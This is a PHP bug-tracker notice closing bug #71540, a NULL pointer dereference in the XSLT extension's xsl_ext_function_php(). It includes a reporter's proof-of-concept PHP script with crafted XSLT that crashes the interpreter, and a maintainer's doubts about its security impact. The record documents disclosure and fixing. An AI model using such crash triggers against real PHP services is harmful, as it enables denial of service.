Bug #71540 [Asn->Csd]: NULL pointer dereference in xsl_ext_function_php()
| From: | stas@php.net | Date: | Mon, 15 Feb 2016 08:11:12 +0000 |
| Subject: | Bug #71540 [Asn->Csd]: NULL pointer dereference in xsl_ext_function_php() | ||
| References: | 1 | Groups: | php.bugs |
| Request: | Send a blank email to php-bugs+get-199220@lists.php.net to get a copy of this message | ||
Edit report at https://bugs.php.net/bug.php?id=71540&edit=1
ID: 71540
Updated by: stas@php.net
Reported by: manhluat at vnsecurity dot net
Summary: NULL pointer dereference in xsl_ext_function_php()
-Status: Assigned
+Status: Closed
Type: Bug
Package: XSLT related
Operating System: Linux
PHP Version: 5.6.18
Assigned To: stas
Block user comment: N
Private report: N
New Comment:
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=c11b23c46577e30e1e0a7c0abfb4c7ea735c34e1
Log: Fix bug #71540 - NULL pointer dereference in xsl_ext_function_php()
Previous Comments:
------------------------------------------------------------------------
[2016-02-09 20:58:25] manhluat at vnsecurity dot net
That was my mistake. Afaik, there might be the only way to reproduce this crash.
------------------------------------------------------------------------
[2016-02-09 20:15:19] stas@php.net
The new example still uses an undefined function int:
Warning: XSLTProcessor::transformToXml(): xmlXPathCompOpEval: function int not found in
/Users/smalyshev/php-5.5/mamp/71540-2.php on line 38
If I use existing XSL function number(), no crash happens. So the question is - is there a way to
reproduce it without specially crafted XSLT that uses undefined functions?
------------------------------------------------------------------------
[2016-02-09 17:13:04] manhluat at vnsecurity dot net
----------------------------------------------
<?php
$xml = <<<EOB
<allusers>
<user>
<id>aaa</id>
<name>bob</name>
</user>
</allusers>
EOB;
$xsl = <<<EOB
<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:php="http://php.net/xsl">
<xsl:output method="html" encoding="utf-8" indent="yes"/>
<xsl:template match="allusers">
<html><body>
<h2>Users</h2>
<table>
<xsl:for-each select="user">
<tr><td>
<xsl:value-of
select="php:functionString('var_dump',uid,int(id))"/>
</td></tr>
</xsl:for-each>
</table>
</body></html>
</xsl:template>
</xsl:stylesheet>
EOB;
$xmldoc = DOMDocument::loadXML($xml);
$xsldoc = DOMDocument::loadXML($xsl);
$proc = new XSLTProcessor();
$proc->registerPHPFunctions();
$proc->importStyleSheet($xsldoc);
echo $proc->transformToXML($xmldoc);
?>
----------------------------------------------
another PoC.
U can see that end-user should be able to input $xml right ? :D.
and in $xsl, developer wanna convert id to
int type. But in this evil scenario,
attacker just supply dummy string to make valuePop returns NULL.
------------------------------------------------------------------------
[2016-02-08 02:39:46] manhluat at vnsecurity dot net
Indeed, the bug can be triggered via 3rd arguments test(test), not first parameter (function name).
Because the type of "test" is not exists, libxslt would return NULL value.
------------------------------------------------------------------------
[2016-02-08 02:22:47] stas@php.net
Seems to be a real bug, but I don't think it is a security issue since you need access to
calling PHP functions to do this, and if you have that, you already have execution privileges.
------------------------------------------------------------------------
The remainder of the comments for this report are too long. To view
the rest of the comments, please view the bug report online at
https://bugs.php.net/bug.php?id=71540
--
Edit this bug report at https://bugs.php.net/bug.php?id=71540&edit=1